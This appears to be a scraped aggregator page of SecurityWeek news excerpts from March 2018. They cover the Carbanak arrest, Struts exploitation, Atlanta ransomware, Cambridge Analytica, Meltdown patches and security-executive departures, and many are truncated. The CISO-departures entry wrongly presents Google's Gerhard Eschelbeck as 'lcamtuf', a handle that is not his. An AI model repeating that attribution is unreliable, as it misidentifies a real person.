What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
SecurityWeek 2018-03-26 18:30:02 Ukrainian Suspected of Leading Carbanak Gang Arrested in Spain (direct link) A Ukrainian national suspected of being the leader of a gang that used Carbanak malware to steal a significant amount of money from banks worldwide has been arrested in Spain, Europol and the Spanish government announced on Monday. According to authorities, the man is believed to be the mastermind of an operation that resulted in losses totaling over €1 billion ($1.24 billion). The hackers targeted over 100 financial organizations in more than 40 countries around the world, stealing up to €10 million ($12.4 million) in a single heist. The suspect was arrested in Alicante, Spain, following an investigation conducted by the Spanish National Police and supported by Europol, private cybersecurity firms, and law enforcement agencies in the United States, Romania, Belarus and Taiwan. Spain's interior ministry identified the suspect as Ukrainian national “Denis K” and noted that he ran the operation with help from three Russian and Ukrainian nationals. The mastermind of the operation had been working from Spain, and he found his accomplices online, but they never met in person. The gang targeted ATMs in Spain's capital city of Madrid in the first quarter of 2017, stealing half a million euros. Police seized computers, jewelry worth €500,000 ($620,000), documents, and two luxury vehicles following Denis K's arrest. Bank accounts and two houses valued at roughly €1 million ($1.24 million) were also blocked. The cybercrime group, tracked as Carbanak, Anunak and Cobalt, has been around since at least 2013 and its activities were first detailed in 2014. According to Spain's interior ministry, investigations into the group started in 2015. According to Europol, the cybercriminals started out by using a piece of malware they had dubbed Anunak. They later improved their malware, a version that the cybersecurity industry has dubbed Carbanak.
Starting in 2016, they launched more sophisticated attacks using a custom version of the penetration testing tool Cobalt Strike. It's worth noting that this is not the only cybercrime group known to use the Carbanak malware. The hackers delivered their malware to bank employees using spear-phishing emails. Once the malware was deployed, it gave attackers access to the compromised organization's internal network, including servers controlling ATMs. The cybercriminals used their access to these servers to remotely instruct ATMs to dispense cash at a predetermined time, when the group's mules would be nearby to collect the money. They also transferred funds from the targeted bank to their own accounts, and modified balances to allow members of the gang to withdraw large amounts of money at cash mac | Tags: Guideline
SecurityWeek 2018-03-26 17:46:02 Former Barclays CISO to Head WEF's Global Center for Cybersecurity (direct link) Troels Oerting to Head the Global Centre for Cybersecurity The 48th annual meeting of the World Economic Forum (WEF) at Davos, Switzerland, in January announced the formation of a new Global Centre for Cybersecurity. Today it announced that Troels Oerting will be its first Head, assuming the role on April 2, 2018. Oerting has been the group chief information security officer (CISO) at Barclays since February 2015. Before that he was head of the European Cybercrime Centre (EC3) -- part of Europol formed in 2013 to strengthen LEA response to cross-border cybercrime in the EU -- and head of the Europol Counter Terrorist and Financial Intelligence Center (since 2012). He also held several other law enforcement positions (such as Head of the Serious Organised Crime Agency with the Danish National Police), and also chaired the EU Financial Cybercrime Coalition. Oerting brings to WEF's Global Center for Cybersecurity a unique combination of hands-on cybersecurity expertise as Barclays' CISO, together with experience of and contacts within Europe-wide cyber intelligence organizations, and a deep knowledge of the financial crimes that will be of particular significance to WEF's members. It is a clear statement from the WEF that the new center should be taken seriously. “The Global Centre for Cybersecurity is the first global platform to tackle today's cyber-risks across industries, sectors and in close collaboration with the public sector. I'm glad that we have found a proven leader in the field who is keen and capable to help us address this dark side of the Fourth Industrial Revolution,” said Klaus Schwab, founder and executive chairman of the World Economic Forum. WEF's unique position at the heart of trans-national business, with the ear of governments, provides the opportunity to develop a truly global approach to cybersecurity.
Most current cybersecurity regulations and standards are based on national priorities aimed against an adversary that knows no national boundaries. The aims of the new center are to consolidate existing WEF initiatives; to establish an independent library of best practices; to work towards an appropriate and agile regulatory framework on cybersecurity; and to provide a laboratory and early-warning think tank on cybersecurity issues. Related: World Economic Forum Announces New Fintech Cybersecurity Consortium Related: World Economic Forum Publishes Cyber Resil | Tags: Guideline
SecurityWeek 2018-03-26 16:46:03 (Déjà vu) Watering Hole Attack Exploits North Korea's Flash Flaw (direct link) An attack leveraging the compromised website of a Hong Kong telecommunications company is using a recently patched Flash vulnerability that has been exploited by North Korea since mid-November 2017, Morphisec warns. The targeted vulnerability, CVE-2018-4878, first became public in early February, after South Korea's Internet & Security Agency (KISA) issued an alert on it being abused by a North Korean hacker group. Adobe patched the flaw within a week. By the end of February, cybercriminals were
SecurityWeek 2018-03-26 15:27:02 One Year Later, Hackers Still Target Apache Struts Flaw (direct link) One year after researchers saw the first attempts to exploit a critical remote code execution flaw affecting the Apache Struts 2 framework, hackers continue to scan the Web for vulnerable servers. The vulnerability in question, tracked as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. The security hole was addressed on March 6, 2017 with the release of versions 2.3.32 and 2.5.10.1. The bug, caused by improper handling of the Content-Type header, can be triggered when performing file uploads with the Jakarta Multipart parser, and it allows a remote and unauthenticated attacker to execute arbitrary OS commands on the targeted system. The first exploitation attempts were spotted one day after the patch was released, shortly after someone made available a proof-of-concept (PoC) exploit. Some of the attacks scanned servers in search of vulnerable Struts installations, while others were set up to deliver malware. Guy Bruneau, researcher and handler at the SANS Internet Storm Center, reported over the weekend that his honeypot had caught a significant number of attempts to exploit CVE-2017-5638 over the past two weeks. The expert said his honeypot recorded 57 exploitation attempts on Sunday, on ports 80, 8080 and 443. The attacks, which appear to rely on a publicly available PoC exploit, involved one of two requests designed to check if a system is vulnerable. Bruneau told SecurityWeek that he has yet to see any payloads. The researcher noticed scans a few times a week starting on March 13, coming from IP addresses in Asia. “The actors are either looking for unpatched servers or new installations that have not been secured properly,” Bruneau said. The CVE-2017-5638 vulnerability is significant as it was exploited by cybercriminals last year to hack into the systems of U.S. credit reporting agency Equifax.
Attackers had access to Equifax systems for more than two months and they managed to obtain information on over 145 million of the company's customers. The same vulnerability was also leveraged late last year in a campaign that involved NSA-linked exploits and cryptocurrency miners. | Tags: Guideline | Stories: Equifax
SecurityWeek 2018-03-26 14:12:04 (Déjà vu) Pentagon Looks to Counter Ever-stealthier Warfare (direct link) The US military has for years enjoyed a broad technological edge over its adversaries, dominating foes with superior communications and cyber capabilities. Now, thanks to rapid advances by Russia and China, the gap has shrunk, and the Pentagon is looking at how a future conflict with a "near-peer" competitor might play out. Air Force Secretary Heather Wilson recently warned that both Russia and China are experimenting with ways to take out the US military's satellites, which form the backbone of America's warfighting machine. "They know that we are dominant in space, that every mission the military does depends on space, and in a crisis or war they are demonstrating capabilities and developing capabilities to seek to deny us our space assets," Wilson said. "We're not going to let that happen." The Pentagon is investing in a new generation of satellites that will provide the military with better accuracy and have better anti-jamming capabilities. Such technology would help counter the type of "asymmetric" warfare practised by Russia, which combines old-school propaganda with social media offensives and cyber hacks. Washington has blamed Moscow for numerous cyber attacks, including last year's massive ransomware attack, known as NotPetya, which paralyzed thousands of computers around the world. US cyber security investigators have also accused the Russian government of a sustained effort to take control of critical US infrastructure systems, including the energy grid. Russia denies involvement and so far, such attacks have been met with a muted US military response. - Public relations shutdown - General John Hyten, who leads US Strategic Command (STRATCOM), told lawmakers the US has "not gone nearly far enough" in the cyber domain.
He also warned that the military still does not have clear authorities and rules of engagement for when and how it can conduct offensive cyber ops. "Cyberspace needs to be looked at as a warfighting domain, and if somebody threatens us in cyberspace, we need to have the authorities to respond," Hyten told lawmakers this week. Hyten's testimony comes after Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, last month said President Donald Trump had no | Tags: Guideline | Stories: NotPetya
SecurityWeek 2018-03-26 13:19:01 (Déjà vu) Energy Sector Most Impacted by ICS Flaws, Attacks: Study (direct link) The energy sector was targeted by cyberattacks more than any other industry, and many of the vulnerabilities disclosed last year impacted products used in this sector, according to a report published on Monday by Kaspersky Lab. The security firm has analyzed a total of 322 flaws disclosed in 2017 by ICS-CERT, vendors and its own researchers, including issues related to industrial control systems (ICS) and general-purpose software and protocols used by industrial organizations. Of the total number of security holes, 178 impact control systems used in the energy sector. Critical manufacturing organizations – this includes manufacturers of primary metals, machinery, electrical equipment, and transportation equipment – were affected by 164 of these vulnerabilities. Other industries hit by a significant number of vulnerabilities are water and wastewater (97), transportation (74), commercial facilities (65), and food and agriculture (61). Many of the vulnerabilities disclosed last year impacted SCADA or HMI components (88), industrial networking devices (66), PLCs (52), and engineering software (52). However, vulnerabilities in general purpose software and protocols have also had an impact on industrial organizations, including the WPA flaws known as KRACK and bugs affecting Intel technology. As for the types of vulnerabilities, nearly a quarter are web-related and 21 percent are authentication issues. A majority of the flaws have been assigned severity ratings of medium or high, but 60 weaknesses are considered critical based on their CVSS score. Kaspersky pointed out that all vulnerabilities with a CVSS score of 10 are related to authentication and they are all easy to exploit remotely.
Kaspersky said 265 of the vulnerabilities can be exploited remotely without authentication and without any special knowledge or skills. It also noted that exploits are publicly available for 17 of the security holes. The company has also shared data on malware infections and other security incidents. In the second half of 2017, Kaspersky security products installed on industrial automation systems detected nearly 18,000 malware variants from roughly 2,400 families. Malware attacks were blocked on almost 38 percent of ICS computers protected by the company, which was slightly less than in the second half of the previous year. Again, the energy sector was the most impacted. According to the security firm, roughly 40 percent of the devices housed by energy organizations were targeted. | Tags: Guideline | Stories: Wannacry | Notes: ★★★★★
SecurityWeek 2018-03-26 12:25:00 Drupal to Patch Highly Critical Vulnerability This Week (direct link) Drupal announced plans to release a security update for Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28, 2018, aimed at addressing a highly critical vulnerability. The Drupal security team hasn't provided information on the vulnerability and says it won't release any details on it until the patch arrives. An advisory containing all the necessary information will be published on March 28. Before that, however, the team advises customers to be prepared for the update's release and to apply it immediately after it is published, given its high exploitation potential. “The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days,” Drupal announced. The highly popular content management system (CMS) powers over one million sites and is used by a large number of e-commerce businesses.
SecurityWeek 2018-03-26 05:39:04 IETF Approves TLS 1.3 (direct link) The Internet Engineering Task Force (IETF) last week announced the approval of version 1.3 of the Transport Layer Security (TLS) traffic encryption protocol. The Internet standards organization has been analyzing proposals for TLS 1.3 since April 2014 and it took 28 drafts to get it to its current form. TLS is designed to allow client and server applications to communicate over the Internet securely. It provides authentication, confidentiality, and integrity mechanisms that should prevent eavesdropping and tampering, even by an attacker who has complete control over the network. There are nearly a dozen major functional differences between TLS 1.2 and TLS 1.3, including ones that should improve performance and eliminate the possibility of certain types of attacks, such as the recently disclosed ROBOT method. The most important changes have been described by the IETF as follows: The list of supported symmetric algorithms has been pruned of all algorithms that are considered legacy. Those that remain all use Authenticated Encryption with Associated Data (AEAD) algorithms. The ciphersuite concept has been changed to separate the authentication and key exchange mechanisms from the record protection algorithm (including secret key length) and a hash to be used with the key derivation function and HMAC. A 0-RTT mode was added, saving a round-trip at connection setup for some application data, at the cost of certain security properties. Static RSA and Diffie-Hellman cipher suites have been removed; all public-key based key exchange mechanisms now provide forward secrecy. All handshake messages after the ServerHello are now encrypted. The newly introduced EncryptedExtension message allows various extensions previously sent in clear in the ServerHello to also enjoy confidentiality protection from active attackers. | Tags: Guideline
SecurityWeek 2018-03-24 02:20:05 (Déjà vu) UK Regulators Search Cambridge Analytica Offices (direct link) British regulators on Friday began searching the London offices of Cambridge Analytica (CA), the scandal-hit communications firm at the heart of the Facebook data scandal, shortly after a judge approved a search warrant. Around 18 enforcement agents from the office of Information Commissioner Elizabeth Denham entered the company's London headquarters at around 8:00pm (2000 GMT) to execute the warrant. The High Court granted the raid request less than an hour earlier, as Denham investigates claims that Cambridge Analytica may have illegally harvested Facebook data for political ends. A full explanation of the legal ruling by Judge Anthony James Leonard will be issued on Tuesday, according to the court. "We're pleased with the decision of the judge," Denham's office said on Twitter. "This is just one part of a larger investigation into the use of personal data and analytics for political purposes," it added in a statement. "As you will expect, we will now need to collect, assess and consider the evidence before coming to any conclusions." The data watchdog's probe comes amid whistleblower accusations that CA, hired by Donald Trump during his primary campaign, illegally mined tens of millions of users' Facebook data and then used it to target potential voters. Fresh allegations also emerged Friday night about the firm's involvement in the 2016 Brexit referendum campaign. Brittany Kaiser, CA's business development director until two weeks ago, revealed it conducted data research for Leave.EU, one of the leading campaign groups, via the UK Independence Party (UKIP), according to The Guardian. 'I was lying' Kaiser, 30, told the newspaper she felt the company's repeated public denials it ever worked on the poll misled British lawmakers and the public. "In my opinion, I was lying," she said.
"In my opinion I felt like we should say, 'this is exactly what we did.'" CA's suspended chief executive Alexander Nix told MPs last month: "We did not work for Leave.EU. We have not undertaken any paid or unpaid work for them, OK?" Nix was suspended this week following the Facebook revelations and a further media sting in which he boasts about entrapping politicians and secretly operating in elections around the world through shadowy front companies. | Tags: Guideline
SecurityWeek 2018-03-23 19:45:03 (Déjà vu) Ransomware Hits City of Atlanta (direct link) A ransomware attack -- possibly a variant of SamSam -- has affected some customer-facing applications and some internal services at the City of Atlanta. The FBI and incident response teams from Microsoft and Cisco are investigating. The city's police department, water services and airport are not affected. The attack was detected early on Thursday morning. By mid-day the city had posted an outage alert to Twitter. In a press conference held Thursday afternoon, mayor Keisha Bottoms announced that the breach had been ransomware. She gave no details of the ransomware demands, but noticeably declined to say whether the ransom would be paid or refused. Bottoms could not at this stage confirm whether personal details had also been stolen in the same breach, but suggested that customers and staff should monitor their credit accounts. Questions on the viability of data backups and the state of system patches were not clearly answered; but it was stressed that the city had adopted a 'cloud first' policy going forwards specifically to improve security and mitigate against future ransomware attacks. A city employee obtained and sent a screenshot of the ransom note to local radio station 11Alive. The screenshot shows a bitcoin demand for $6,800 per system, or $51,000 to unlock all systems. It is suggested that the ransom note is similar to ones used by the SamSam strain of ransomware. Steve Ragan subsequently tweeted, "1 local, 2 remote sources are telling me City of Atlanta was hit by SamSam. The wallet where the ransom is to be sent (if they pay) has collected $590,000 since Jan 27." SamSam ransomware infected two healthcare organizations earlier this year. SamSam is not normally introduced via a phishing attack, but rather following a pre-existing breach. This could explain the concern over data theft on top of the data encryption.
It also raises the question over whether the initial breach was due to a security failure, an unpatched system, or via a third-party supplier. Ransomware is not a new threat, and there are mitigations -- but it continues to cause havoc. Official advice is, wherever at all possible, refuse to pay. The theory is if the attackers cease getting a return on their attacks, they will turn to something easier with a better ROI on their time. This approach simply isn't working. Sometimes payment can be avoided by recovering data from backups | Stories: NotPetya, Wannacry
SecurityWeek 2018-03-23 19:20:04 (Déjà vu) Facebook as an Election Weapon, From Obama to Trump (direct link) The use of Facebook data to target voters has triggered global outrage with the Cambridge Analytica scandal. But the concept is nothing new: Barack Obama made extensive use of the social network in 2008 and stepped up "micro-targeting" in his 2012 re-election effort. The unauthorized gathering of data on 50 million Facebook users by a British consulting firm that worked for Donald Trump has sparked intense debate on how politicians and marketers -- appropriately or not -- use such personal information. But Cambridge Analytica, the firm at the center of the firestorm, has stressed it is far from alone in using data gleaned online to precisely target voters. "Obama's 2008 campaign was famously data-driven, pioneered micro-targeting in 2012, talking to people specifically based on the issues they care about," the British firm said on Twitter. Former members of the Obama team fiercely dispute any comparison to the Cambridge Analytica case, in which an academic researcher is accused of scooping up a massive trove of data without consent using a Facebook personality quiz, and transferring it improperly to the firm. "How dare you!" tweeted Michael Simon, who headed Obama's micro-targeting team in 2008, in response to the firm. "We didn't steal private Facebook profile data from voters under false pretenses. OFA (Obama's campaign) voluntarily solicited opinions of hundreds of thousands of voters. We didn't commit theft to do our groundbreaking work." Jeremy Bird, a member of the 2012 Obama team, echoed those sentiments, warning: "Do not use the Obama campaign to justify your shady business." But while Cambridge Analytica's methods for acquiring data are in dispute, the underlying goal -- using social media to take the pulse of voters and find those who are persuadable -- was common to both campaigns.
So-called micro-targeting, which borrows techniques from the marketing world, is as much about mobilizing voters and getting them to the polls as about changing minds. And micro-targeting long pre-dates the internet, with campaigns as early as 1976 using this method, according to Victoria Farrar-Myers, a political scientist and researcher at Southern Methodist University. Everyone who uses social media makes a decision to share some personal information, she says, although they "may not be fully aware of how people can utilize that." "Being able to micro-target a voter down to what magazine they read and what issues might make them turn out does have an advantage for a candidate when they're running for an election."
SecurityWeek 2018-03-23 14:50:03 U.S. Imposes Sanctions on Iranians for Hacking (direct link) The United States imposed sanctions on Friday on 10 Iranians and an Iranian company for alleged hacking of hundreds of universities in the US and abroad and the theft of "valuable intellectual property and data." The Mabna Institute "engaged in the theft of personal identifiers and economic resources for private financial gain" and for the benefit of Iran's Islamic Revolutionary Guard Corps, the US Treasury Department said. The two founders of the Mabna Institute were among the 10 people whose assets are subject to US seizure, it said. The Justice Department said nine of the 10 had been indicted separately for conspiracy to commit computer intrusions and other crimes. Since 2013, the Mabna Institute carried out cyber intrusions into the computer systems of 144 US universities, the Treasury Department said, and 176 universities in 21 foreign countries. "For many of these intrusions, the defendants acted at the behest of the Iranian government and, specifically, the Iranian Revolutionary Guard Corps," Deputy Attorney General Rod Rosenstein said in a statement. "The Department of Justice will aggressively investigate and prosecute hostile actors who attempt to profit from America's ideas by infiltrating our computer systems and stealing intellectual property," Rosenstein added.
SecurityWeek 2018-03-23 12:42:03 Pwner of a Lonely Heart: The Sad Reality of Romance Scams (direct link) Valentine's Day is a special holiday, but for victims of romance scams it is a tragic reminder, not only of love lost, but financial loss as well. According to the FBI Internet Crime Complaint Center (IC3), romance scams accounted for $230 million in losses in 2016. Men and women may jokingly refer to their significant other as their “partner in crime,” but when it comes to romance scams, this joke may become a sad reality. In addition to financial losses, many scammers may convince their victims to become money mules or shipping mules, directly implicating them in illegal behavior. Recently, Agari researchers identified a woman in Los Angeles who has sent nearly half a million dollars to a scammer that she has never even met. Even worse, this woman knowingly cashes bad checks and fake money orders on his behalf. The FBI has warned her to stop, yet it is unlikely she will do so. The victims of romance scams are typically women in their 40s to 50s, usually divorced or widowed and looking for a new relationship. They are targeted by scam artists on dating web sites, who have the ability to refine their searches for women that fit their target demographics. The scam artists create profiles of charming and successful men to engage these lonesome women. Dating sites frequently ask what women are looking for in a partner, so it is easy for the scammer to say exactly what they need to seem like “Mr. Right.” Once these scammers engage with their victims, there are an inevitable variety of excuses why they can't meet – claims of overseas military service or mission trips are common, and help to further cement the supposed righteousness of the scammer. After a few months of correspondence, the scammer will claim a supposed tragedy: a lost paycheck or medical fees are common – and request a small loan.
The typical loss in these scams is $14,000, not to mention the considerable psychological damage – victims of romance scams frequently withdraw from their social circles, embarrassed by the stigma. Even worse, as in the case of our anonymous victim, some of these scams can continue on for years, with frequent requests for financial support. Once trust is established with their victims, these scammers may also begin to use them as “mules” to cash fake checks, make deposits, accept shipment of stolen goods, and more. In the case of our anonymous victim, her family has pleaded with her to stop sending her suitor more money, and the FBI has warned her that her behavior is illegal; and yet she persists. | Tags: Guideline | Stories: Equifax, Yahoo
SecurityWeek 2018-03-23 12:05:01 TrickBot Gets Computer Locking Capabilities (direct link) A recently observed variant of the TrickBot banking Trojan has added a new module that can lock a victim's computer for extortion purposes, Webroot reports. First observed in late 2016 and said to be the work of cybercriminals behind the notorious Dyre Trojan, TrickBot has seen numerous updates that expanded not only its capabilities, but also its target list. Last year, the malware received an update that added worm-like capabilities, allowing it to spread locally via Server Message Block (SMB). Webroot now says that the malware attempts to leverage
SecurityWeek 2018-03-22 18:44:01 (Déjà vu) Worried About Being on Facebook? Some Options Explained (direct link) Managing Your Privacy with Facebook A snowballing Facebook scandal over the hijacking of personal data from millions of its users has many wondering whether it's time to restrict access to their Facebook information or even leave the social network altogether, with the #deletefacebook movement gaining traction. Here are some options open to the worried Facebook user. Put it to sleep Putting a Facebook account on hold used to be difficult but has become a lot easier. To deactivate their account, users need to go on their "settings" page, then on to "manage account", where they can "deactivate" their account. Facebook defines this action as putting activity "on hold". The move disables a user's profile and removes their name and pictures from most things they have shared. Some information may still remain visible, like a user's name in a friend's list, or messages exchanged with friends. If they have second thoughts, users can easily restore a deactivated profile. Kill the account Deleting an account is a more radical step, as users will not be able to access it again once they've gone for that option. Facebook warns users that it can take up to 90 days to purge the network of a user's posts. Even so, some information is likely to stay online, for example messages sent to friends. According to French data expert Nathalie Devillier there is also a chance that Facebook holds on to information about some users if asked to by US authorities in the name of national security. Be more alert Facebook users can check with the network how much of their personal information is accessible on the network. In "settings", the option "download a copy of your Facebook data" allows a user to do just that. Once Facebook has double-checked a user's password, the site compiles and then e-mails a compressed file.
The file gives an overview of the pictures and videos a user has posted, their downloaded apps,
SecurityWeek 2018-03-22 16:54:01 (Déjà vu) You Can DDoS an Organization for Just $10 per Hour: Cybercrime Report (direct link) The cost of having an organization targeted by a distributed denial of service (DDoS) attack for an hour is as low as $10, cybersecurity firm Armor says. The low cost of launching such attacks results from the proliferation of cybercrime-as-a-service, one of the most profitable business models adopted by cybercriminals over the past years. It allows wannabe criminals to employ the resources of established cybercriminals for their nefarious purposes, including malware distribution, DDoS-ing, spam, and more. All that miscreants have to do is to access underground markets or forums and hire the desired cybercrime service to conduct the malicious actions for them. And while the incurred financial losses total billions or even more for affected organizations, the price of hiring such a service is highly affordable to anyone. According to Armor's The Black Market Report: A Look into the Dark Web | Tags: Guideline
SecurityWeek.webp 2018-03-22 16:21:01 GitHub Security Alerts Lead to Fewer Vulnerable Code Libraries (lien direct) GitHub says the introduction of security alerts last year has led to a significantly smaller number of vulnerable code libraries on the platform. The code hosting service announced in mid-November 2017 the introduction of a new security feature designed to warn developers if the software libraries used by their projects contain any known vulnerabilities. The new feature looks for vulnerable Ruby gems and JavaScript NPM packages based on MITRE's Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added to this list, all repositories that use the affected version are identified and their maintainers informed. Users can choose to be notified via the GitHub user interface or via email. When it introduced security alerts, GitHub compared the list of vulnerable libraries to the Dependency Graph in all public code repositories. The Dependency Graph is a feature in the Insights section of GitHub that lists the libraries used by a project. Since the introduction of security alerts, this section also informs users about vulnerable dependencies, including CVE identifiers and severity of the flaws, and provides advice on how to address the issues. The initial scan conducted by GitHub revealed more than 4 million vulnerabilities in over 500,000 repositories. Affected users were immediately notified and by December 1, roughly two weeks after the launch of the new feature, more than 450,000 of the flaws were addressed either by updating the affected library or removing it altogether. According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers. “Since [December 1], our rate of vulnerabilities resolved in the first seven days of detection has been about 30 percent,” GitHub said. 
“Additionally, 15 percent of alerts are dismissed within seven days; that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.” GitHub was recently hit by a record-breaking distributed denial-of-service (DDoS) attack that peaked at 1.3 Tbps, but the service was down for less than 10 minutes. Related: GitHub Enforces Stronger Encryption Related: Slack Tokens Leaked on GitHub Put Companies at Risk Guideline
SecurityWeek.webp 2018-03-22 15:30:01 (Déjà vu) Iran-linked Hackers Adopt New Data Exfiltration Methods (lien direct) An Iran-linked cyber-espionage group has been using new malware and data exfiltration techniques in recent attacks, security firm Nyotron has discovered. The threat actor, known as OilRig, has been active since 2015, mainly targeting United States and Middle Eastern organizations in the financial and government industries. The group has been already observed using multiple tools and adopting new exploits fast, as well as switching to new Trojans in Guideline APT 34
SecurityWeek.webp 2018-03-22 15:10:01 Security Practitioners: 10 Signs You Need to be More Direct (lien direct) Conflict isn't Pleasant, But Sometimes it Can be Healthy and Necessary When Done Properly and Respectfully Living and working in different cultures gives you a broader perspective across a variety of different areas than you might have attained otherwise. It is one of the things I am most grateful for professionally and has taught me to appreciate that each culture has its own advantages and disadvantages. There is one particular aspect of some cultures that I think we in security can learn a lot from. Which cultural aspect am I referring to? Directness. Those of you who know me know that I am very direct and that I am a big proponent of directness. Directness is something that some cultures do better than others. So how can we as security practitioners identify areas in which directness can help us improve? I present: 10 signs you need to be more direct. 1. Bad ideas hang around: I remember watching the Challenger explosion on television. After the investigation, groupthink was found to be one of the reasons that the launch was allowed to go ahead, despite known risks. People were simply afraid to state their concerns directly. While the stakes are certainly lower in your security organization, the principle holds true. If people are afraid to be direct, it often results in bad ideas hanging around far longer than they need to. Whereas in a direct culture, a bad idea can be considered and politely dismissed in a relatively short amount of time, in an indirect culture, it may linger far longer than it should. That results in valuable resources being spent on activities that don't provide much value. 2. Good ideas don't come forward: In a similar manner, if people are afraid to be direct, it often keeps them from suggesting new ideas.
Perhaps the solution to that big problem you've been worried about is found in the thoughts of one of your team members.  But if it stays there, it doesn't do you any good. 3. The team has no idea where it stands:  Security teams need to know that the work they're doing adds value to the organization, improves its security posture, and helps mitigate risk.  In order to gauge where they stand, the security team needs to know what success in each of those areas means.  The only way I know of to communicate what success means is to do so directly.  That enables the team to make progress more effectively. 4. Strategic direction and goals are unclear:  Building on number 3, communicating strategic direction and goals clearly and directly helps the team understand where the organization is going and what success means.  Not surprisingly, that clarity will assist the security team in maturing far more quickly and efficiently. 5. Everything is above average - always:  I always love it when I hear people tell me that everyone on their team is exception Guideline
SecurityWeek.webp 2018-03-22 14:36:05 More Chrome OS Devices Receive Meltdown, Spectre Patches (lien direct) The latest stable channel update for Google's Chrome OS operating system includes mitigations for devices with Intel processors affected by the Spectre and Meltdown vulnerabilities. Meltdown and Spectre attacks exploit design flaws in Intel, AMD, ARM and other processors. They allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). While Meltdown and Variant 1 can be addressed with software updates, Variant 2 also requires microcode updates from the manufacturers of the impacted processors. Software mitigations include kernel page-table isolation (KPTI/KAISER) and a technique developed by Google called Retpoline. Meltdown and Spectre were discovered independently by three teams of researchers. Google Project Zero researcher Jann Horn was one of the experts who found the flaws, which meant the company had enough time to work on patches before the details of the vulnerabilities were disclosed. In the case of Chrome OS, Google rolled out the first Meltdown mitigations with the release of version 63 in mid-December, more than two weeks before public disclosure. At the time, Google rolled out the KPTI/KAISER patch to roughly 70 Intel-based Chromebook models from Acer, ASUS, Dell, HP, Lenovo, Samsung and others. Google released Chrome OS 65 on Monday and informed users that it includes the KPTI mitigation against Meltdown for additional Intel devices with version 3.14 of the kernel. 
A status page created by Google to help users track the availability of Meltdown and Spectre patches for Chrome OS shows that all older Chromebooks with Intel processors, including with kernel versions 3.14 and 3.8, should get the KPTI mitigation for Meltdown with the release of Chrome OS 66, which is currently scheduled for release on April 24. Chrome OS 65 also brings the Retpoline mitigation for Spectre Variant 2 to all devices with Intel processors. Google noted that Variant 2 can be exploited using virtualization, and while Chrome OS devices don't use this type of feature, some measures have been taken to proactively protect users. In the case of Spectre Variant 1, the eBPF feature in the Linux kernel can be abused for exploitation, but Chrome OS is not impacted as it disables eBPF, Google said. The tech giant informs customers that Chrome O
SecurityWeek.webp 2018-03-22 12:42:01 (Déjà vu) Netflix Launches Public Bug Bounty Program (lien direct) Netflix announced on Wednesday the launch of a public bug bounty program with rewards of up to $15,000, and Dropbox has made some changes to its vulnerability disclosure policy, promising not to sue researchers. Netflix has had a vulnerability disclosure policy for the past 5 years and a private bug bounty program since September 2016. The company has now decided to make its bug bounty initiative public through the Bugcrowd platform. Its vulnerability disclosure policy and private bug bounty have helped Netflix patch 190 vulnerabilities. The private program started with 100 of Bugcrowd's top researchers, but more than 700 white hat hackers were later invited in preparation for the public program. Researchers can earn between $100 and $15,000 for flaws affecting one of several Netflix domains and the mobile applications for iOS and Android. The company claims the highest reward paid out to date is $15,000 for a critical security hole. The types of vulnerabilities that can be submitted include cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, authentication and authorization, data exposure, remote code execution, redirection, business logic, MSL protocol, and mobile API issues. Netflix says it acknowledges vulnerability reports, on average, in less than 3 days. “Engineers at Netflix have a high degree of ownership for the security of their products and this helps us address reports quickly,” Netflix said in a blog post. “Our security engineers also have the autonomy and freedom to make reward decisions quickly based on the reward matrix and bug severity. 
This ultimately helps create an efficient and seamless experience for researchers which is important for engagement in the program.” Dropbox makes changes to vulnerability disclosure policy Dropbox has not set a maximum amount of money that researchers can earn through its HackerOne-based bug bounty program. To date, the company has paid out more than $200,000 for over 220 vulnerabilities. However, the changes made by the company are not related to bounty amounts and instead they focus on the vulnerability disclosure policy and assuring researchers that they will not get sued even if they accidentally violate terms of the program. Several researchers have faced lawsuits recently over vulnerability disclosures, and Dropbox wants to help avoid such situations. The company has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.” Dropbox says it will allow researche
SecurityWeek.webp 2018-03-22 06:06:00 Google, Twitter Security Chiefs Leaving Companies (lien direct) Michael Coates, the chief information security officer (CISO) of Twitter, announced on Wednesday that he has decided to leave the social media giant. Google security chief Gerhard Eschelbeck has also announced his departure. Coates, who joined Twitter in January 2015, says he will co-found a cybersecurity startup, but has not shared any details. Twitter CISO Michael Coates leaves company According to his LinkedIn profile, Coates has been working in cybersecurity since 2004, including at Motorola, Aspect Security and Shape Security. Between March 2010 and October 2013, he led Mozilla's Security Assurance program. Until recently he was on the global board of directors of the OWASP Foundation, and is presently on the board of several organizations, including Comprehend Systems, Synack, and Vendor Security Alliance. The Verge reported that Joseph Camilleri, a senior manager for information security and risk, will act as interim CISO at Twitter following Coates' departure. Eschelbeck, vice president of security and privacy engineering at Google, also announced his departure on Wednesday, but has not shared his plans for the future. lcamtuf leaves Google Eschelbeck, known online as lcamtuf, previously held leadership positions at McAfee, Qualys, Webroot and Sophos. He joined Google in October 2014. The announcements made by Eschelbeck and Coates come just days after reports that Facebook CISO Alex Stamos is leaving the social media giant in the wake of internal clashes over how to deal with the platform being used to spread misinformation. “Despite the rumors, I'm still fully engaged with my work at Facebook,” Stamos said in response to a New York Times article on his alleged departure from Facebook. “It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security.” Related: Guideline
